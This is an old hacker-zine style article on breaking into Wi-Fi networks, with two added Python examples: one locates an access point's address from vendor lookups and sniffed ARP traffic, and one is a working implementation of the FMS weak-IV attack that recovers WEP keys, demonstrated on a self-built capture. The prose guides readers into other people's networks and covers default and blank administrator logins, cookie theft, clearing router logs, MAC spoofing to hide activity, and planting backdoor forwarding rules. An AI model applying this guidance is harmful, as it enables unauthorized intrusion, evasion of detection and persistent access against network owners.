More Fun With Wireless Hacking

by VileSYN

As prices drop, wireless becomes more and more common.  While many people ignore the vulnerabilities that Wi-Fi brings with it, it's an easy way for anyone to enter a network.  Even setting WEP keys will not keep a determined hacker from compromising the Wi-Fi access point (AP) or router.

Many tools are available on various operating systems for this.  NetStumbler for Windows, MacStumbler for Mac OS, Wellenreiter for Linux/UNIX, and BSD-Airtools for Free/Open/NetBSD are Wi-Fi "stumblers" that help you find APs.

Most of these applications can take a GPS feed and map the access points detected while scanning, and such stumbling tools are what make wireless hacking such a threat.  Using them is quite simple and to the point.  Each listens for beacon frames (the active scanners also send probe requests and collect the probe responses) and reports, for every AP heard, the SSID, whether WEP is enabled, the channel, the signal strength, and the AP's MAC address (BSSID).  They also guess the manufacturer from the MAC address, but some entries are misidentified: the lookup only knows which company was assigned that block of addresses, and for a rebadged device that may be the radio chipset maker rather than the brand on the box.

The registered owner of a MAC address can be looked up in the IEEE's OUI registry at standards-oui.ieee.org/oui/oui.txt.  It does not list every MAC address; it lists every assigned Organizationally Unique Identifier, the first three octets of the address, together with the company that owns it.  This brings us to another key to entering the network: the IP address of the AP.  Sometimes you can get on easily because the network hands you an address over DHCP, but not every network runs DHCP.  In that case there are a few ways to find the address of the AP.

The first is to try the default IP the wireless device shipped with.  For instance, D-Link routers use 192.168.0.1 and their stand-alone access points use 192.168.0.50, while Linksys uses 192.168.1.1 and Netgear uses 192.168.0.1.  If the default has been changed, use a sniffer to capture traffic on the AP's channel and read the addresses in use: the subnet the clients are on, and the address they keep sending ARP requests for, give the AP away.
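The two steps above (vendor from the BSSID, then default address or sniffed traffic) as one worked example.  This is added here and is not code from the article or from any of the stumblers it names.  The registry excerpt, the default-address table (only the three vendors the article quotes) and the "sniffed" address lists are constructed inline; the ARP heuristic is my own assumption that the address every client keeps resolving is the gateway.

```python
"""Added example (not from the original article): look up a BSSID's vendor
in the IEEE OUI registry format, try that vendor's documented default
address first, and fall back to what sniffed traffic shows when the
defaults have been changed. All sample data below is constructed."""
import re
from collections import Counter

# Constructed excerpt in the layout of standards-oui.ieee.org/oui/oui.txt.
# The real file holds tens of thousands of entries; only the "(hex)" line
# of each entry is needed for the lookup, the rest is the postal address.
SAMPLE_OUI_TXT = """\
00-05-5D   (hex)\t\tD-Link Systems, Inc.
00055D     (base 16)\t\tD-Link Systems, Inc.
\t\t\t\tStreet address line (constructed)
\t\t\t\tCity  ST  00000
\t\t\t\tUS

00-09-5B   (hex)\t\tNetgear, Inc.
00095B     (base 16)\t\tNetgear, Inc.
\t\t\t\tStreet address line (constructed)
\t\t\t\tCity  ST  00000
\t\t\t\tUS

00-0C-41   (hex)\t\tCisco-Linksys, LLC
000C41     (base 16)\t\tCisco-Linksys, LLC
\t\t\t\tStreet address line (constructed)
\t\t\t\tCity  ST  00000
\t\t\t\tUS
"""

OUI_HEX_LINE = re.compile(r"^([0-9A-F]{2})-([0-9A-F]{2})-([0-9A-F]{2})\s+\(hex\)\s+(.+?)\s*$")


def parse_oui_registry(text):
    """Map six-hex-digit OUI prefix -> organisation name."""
    table = {}
    for line in text.splitlines():
        m = OUI_HEX_LINE.match(line)
        if m:
            table[m.group(1) + m.group(2) + m.group(3)] = m.group(4)
    return table


def normalize_mac(mac):
    """Accept 00:0c:41:..., 00-0C-41-..., 000c41...; return 12 upper-case hex digits."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac).upper()
    if len(digits) != 12:
        raise ValueError("not a MAC address: %r" % (mac,))
    return digits


def vendor_of(mac, table):
    """Only the first three octets are registered, so this names the block owner,
    which for a rebadged radio may be the chipset maker rather than the brand."""
    return table.get(normalize_mac(mac)[:6])


# Factory defaults quoted in the article, keyed by a substring of the registry name.
DEFAULT_ADDRESSES = {
    "d-link": ["192.168.0.1", "192.168.0.50"],   # router, then stand-alone AP
    "linksys": ["192.168.1.1"],
    "netgear": ["192.168.0.1"],
}


def default_candidates(vendor):
    if not vendor:
        return []
    name = vendor.lower()
    for needle, addrs in DEFAULT_ADDRESSES.items():
        if needle in name:
            return list(addrs)
    return []


def gateway_from_arp(arp_requests):
    """Sniffed ARP who-has (sender_ip, target_ip) pairs: the address every client
    keeps resolving is almost always the gateway, i.e. the router/AP (assumption)."""
    targets = Counter(target for _sender, target in arp_requests)
    return targets.most_common(1)[0][0] if targets else None


def find_ap_address(bssid, oui_table, observed_ips, arp_requests):
    """Return (address, how). Use the vendor default only if it is actually
    seen on the air; otherwise fall back to the ARP heuristic."""
    vendor = vendor_of(bssid, oui_table)
    seen = set(observed_ips)
    for addr in default_candidates(vendor):
        if addr in seen:
            return addr, "vendor default for %s" % vendor
    guess = gateway_from_arp(arp_requests)
    if guess is not None:
        return guess, "most-requested ARP target"
    return None, "no evidence yet; keep sniffing"


OUI_TABLE = parse_oui_registry(SAMPLE_OUI_TXT)

# Constructed captures. Network 1: a Linksys box left at its default address.
NET1_BSSID = "00:0C:41:12:34:56"
NET1_IPS = ["192.168.1.1", "192.168.1.100", "192.168.1.101"]
NET1_ARP = [("192.168.1.100", "192.168.1.1"), ("192.168.1.101", "192.168.1.1"),
            ("192.168.1.1", "192.168.1.100")]
# Network 2: a Netgear box renumbered to 10.0.0.0/24, so 192.168.0.1 is not there.
NET2_BSSID = "00-09-5B-AA-BB-CC"
NET2_IPS = ["10.0.0.1", "10.0.0.20", "10.0.0.21", "10.0.0.22"]
NET2_ARP = [("10.0.0.20", "10.0.0.1"), ("10.0.0.21", "10.0.0.1"),
            ("10.0.0.22", "10.0.0.1"), ("10.0.0.1", "10.0.0.21")]

if __name__ == "__main__":
    for bssid, ips, arp in ((NET1_BSSID, NET1_IPS, NET1_ARP), (NET2_BSSID, NET2_IPS, NET2_ARP)):
        print(bssid, vendor_of(bssid, OUI_TABLE), find_ap_address(bssid, OUI_TABLE, ips, arp))
```

The registry lookup is deliberately limited to the "(hex)" line of each entry because that is the only line carrying the prefix; feeding it the real oui.txt instead of the excerpt needs no other change.  Note that the vendor default is only trusted when the address has actually been seen in captured traffic, since a default that nobody on the network talks to is a guess, not a finding.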

Once you have the IP and have associated with the AP, it's time to connect elsewhere.  Even though you are associated, WEP might be holding you back.  WEP is the encryption defined in the original IEEE 802.11 standard and used by 802.11a/b/g equipment.  When the standard was written, nobody thought through how it could be cracked.  WEP seeds RC4 with a 24-bit initialization vector (IV) prepended to the shared key, and that IV is sent in the clear with every frame.  The IV space is so small that a busy network repeats IVs within hours, and a class of "weak" IVs leaks information about individual key bytes (the Fluhrer-Mantin-Shamir attack).  Since every encrypted data frame begins with the same predictable LLC/SNAP byte (0xAA), an attacker who passively captures enough weak-IV frames can recover the key statistically, without ever having to modify or inject a packet.

With WEP tools like WEPCrack, AirSnort, and BSD-Airtools' dweputils, recovering the key from a capture takes only a few minutes once enough weak-IV frames have been collected; the waiting is in the capture, not the cracking.

Some 104-bit (marketed as 128-bit) keys can take up to 36 hours of collecting, depending on how busy the network is and the speed of your system, but logging your hits or using a GPS will show you where that network was when you first found it, so you can go back once the key is broken.
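The weak-IV attack the previous paragraphs describe, as an added example that is not from the article and not code from WEPCrack, AirSnort or dweputils.  It assumes the classic FMS observation: the first plaintext byte of each data frame is the LLC/SNAP byte 0xAA, and IVs of the form (A+3, 255, X) leak key byte A.  The 40-bit key and the "capture" are constructed inside the block by encrypting under that key; nothing here comes from a real network.

```python
"""Added example, not from the article or from WEPCrack/AirSnort/dweputils:
a toy version of the Fluhrer-Mantin-Shamir weak-IV attack on WEP. The
"capture" is constructed by encrypting frames under a key we choose; the
attack then recovers that key from IVs and first ciphertext bytes alone."""
from collections import Counter

SNAP_FIRST_BYTE = 0xAA  # LLC/SNAP DSAP: the known first plaintext byte of a WEP data frame


def rc4_ksa(key):
    """RC4 key scheduling; key is a sequence of ints 0..255."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    return s


def rc4_first_byte(key):
    """First keystream byte (one PRGA step after the KSA)."""
    s = rc4_ksa(key)
    j = s[1]
    s[1], s[j] = s[j], s[1]
    return s[(s[1] + s[j]) % 256]


def wep_first_ciphertext_byte(iv, secret):
    """WEP keys RC4 with IV || secret; the 24-bit IV goes out in the clear."""
    return rc4_first_byte(bytes(iv) + bytes(secret)) ^ SNAP_FIRST_BYTE


def make_weak_iv_capture(secret):
    """Constructed capture: for each secret byte index a, the 256 IVs of the
    classic weak form (a+3, 255, x). A real capture holds millions of frames
    with arbitrary IVs and the attacker filters for the ones that resolve."""
    packets = []
    for a in range(len(secret)):
        for x in range(256):
            iv = (a + 3, 255, x)
            packets.append((iv, wep_first_ciphertext_byte(iv, secret)))
    return packets


def fms_vote(packets, known_prefix, a):
    """Votes for secret byte a, given secret bytes 0..a-1 already recovered.
    For each frame, replay the first a+3 KSA steps (IV plus known key bytes
    are all that is needed). If S is then "resolved", i.e. S[1] < a+3 and
    S[1] + S[S[1]] == a+3, the first keystream byte equals S[a+3] after
    step a+3 with probability about e^-3, and that step's j is S^-1[out],
    so K[a+3] = S^-1[out] - j - S[a+3]."""
    votes = Counter()
    key_known = list(known_prefix)
    for iv, c0 in packets:
        k = list(iv) + key_known
        s = list(range(256))
        j = 0
        for i in range(a + 3):
            j = (j + s[i] + k[i]) % 256
            s[i], s[j] = s[j], s[i]
        if s[1] >= a + 3 or s[1] + s[s[1]] != a + 3:
            continue  # this IV says nothing about byte a
        out = c0 ^ SNAP_FIRST_BYTE
        votes[(s.index(out) - j - s[a + 3]) % 256] += 1
    return votes


def recover_key(packets, key_len):
    """Byte-at-a-time recovery by majority vote: wrong votes are spread
    thinly over all 256 values, the right one gets about 5% of resolved IVs."""
    secret = []
    for a in range(key_len):
        votes = fms_vote(packets, secret, a)
        if not votes:
            raise ValueError("no resolved IVs for key byte %d" % a)
        secret.append(votes.most_common(1)[0][0])
    return bytes(secret)


SECRET = bytes.fromhex("1f2e3d4c5b")  # constructed 40-bit WEP key
PACKETS = make_weak_iv_capture(SECRET)

if __name__ == "__main__":
    print("capture:", len(PACKETS), "frames")
    print("recovered:", recover_key(PACKETS, len(SECRET)).hex(), "actual:", SECRET.hex())
```

Run it and the recovered key is printed beside the real one.  Each resolved IV votes for the right byte only about one time in twenty, so the attack is statistical: with the full 256-IV class for each key byte the majority vote is right for almost every key, and a 104-bit key simply needs eight more classes of weak IVs to turn up on the air, which is why the hours go into collecting the capture rather than cracking it.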

Once this is all done, the network is under your control.  From here you don't have to worry about the router blocking your system from anything, apart from the occasional log entry or SNMP trap it may still emit.  If you know the default password for the specific AP, you can always go for that first.  If you do not know the defaults for a Wi-Fi device, go to the manufacturer's site and look up the model to find the documentation that lists them.

Another way in is a terminal service: Remote Desktop on Windows, or rdesktop on Linux/UNIX, to connect to a Windows desktop on the network.  (Remember, many people never set a password for the Admin or Administrator account in Windows, though Windows XP by default refuses network logons to accounts with a blank password, so this mostly applies to older systems.)  From there you can use the local browser and see whether any cookies were left behind from logging into the AP in the past.

Remember, even though you're taking a back door into the network, logs can still show your presence.  Clearing the router's logs, or entering the network with a man-in-the-middle (MITM) attack or a spoofed MAC address (cloning a client that is already associated, so your traffic is logged as theirs), makes your activity look like normal traffic on the network.  Adding a back door on the router, such as a forwarding rule or route to a service on another system you can reach, can do a vast amount of good for your final compromise.

These particular methods are slowly becoming obsolete.  Wi-Fi Protected Access (WPA) provides better authentication (802.1X or a pre-shared key) and replaces WEP's static key with per-packet keys and a message integrity check, so there is no weak-IV pattern to harvest.  Many wireless devices now also offer disabling SSID broadcast so they are not "stumbled" upon by active scanners, although a passive sniffer still sees the SSID in probe responses and association frames whenever a real client connects.

Even though this new technology is on offer, it doesn't mean the weak link in any network, the person configuring it, is getting any smarter, or that people are even upgrading.  Whether you plan to secure your own Wi-Fi network or conquer another, the signals are always being monitored.

Thanx to: The error between the chair and the computer, FBSDHN, SE, and all those other people.
